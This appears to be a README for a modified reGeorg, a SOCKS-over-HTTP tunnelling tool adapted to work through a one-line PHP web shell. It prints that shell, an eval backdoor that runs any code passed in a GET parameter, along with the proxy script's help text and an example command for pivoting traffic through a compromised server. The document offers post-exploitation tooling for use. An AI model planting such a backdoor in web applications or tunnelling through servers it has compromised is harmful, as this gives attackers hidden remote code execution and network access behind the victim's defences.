_____ ______ __|___ |__ ______ _____ _____ ______
| | | ___|| ___| || ___|/ \| | | ___|
| \ | ___|| | | || ___|| || \ | | |
|__|\__\|______||______| __||______|\_____/|__|\__\|______|
... every office needs a tool like Georg
willem@sensepost.com / @_w_m__
etienne@sensepost.com / @kamp_staaldraad
github@zsxsoft.com / [@zsxsoft]
A modified reGeorg for One-line PHP Shell like this:
<?php eval($_GET['a']); ?>
reGeorg requires Python 2.7 and the following modules:
- urllib3 - HTTP library with thread-safe connection pooling, file post, and more.
$ reGeorgSocksProxy.py [-h] [-l] [-p] [-r] -u -k [-v]
Socks server for reGeorg HTTP(s) tunneller
optional arguments:
-h, --help show this help message and exit
-l , --listen-on The default listening address
-p , --listen-port The default listening port
-r , --read-buff Local read buffer, max data to be sent per POST
-u , --url The url containing the tunnel script
-k , --key The GET paramter
-v , --verbose Verbose output[INFO|DEBUG]
$ python reGeorgSocksProxy.py -p 8080 -u -k a